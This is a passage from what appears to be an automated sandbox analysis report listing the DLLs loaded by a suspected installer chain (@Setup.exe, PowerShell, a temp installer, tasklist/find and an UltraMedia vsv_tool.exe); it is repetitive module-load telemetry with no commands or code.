              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\@Setup.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-3D3BV.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\NBKXWJSCH7YAAAADC9LJIYY.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: explorerframe.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: dlnashext.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: wpdshext.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-9Q81V.tmp\NBKXWJSCH7YAAAADC9LJIYY.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: msimg32.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Roaming\UltraMedia\vsv_tool.exeSection loaded: avifil32.dll
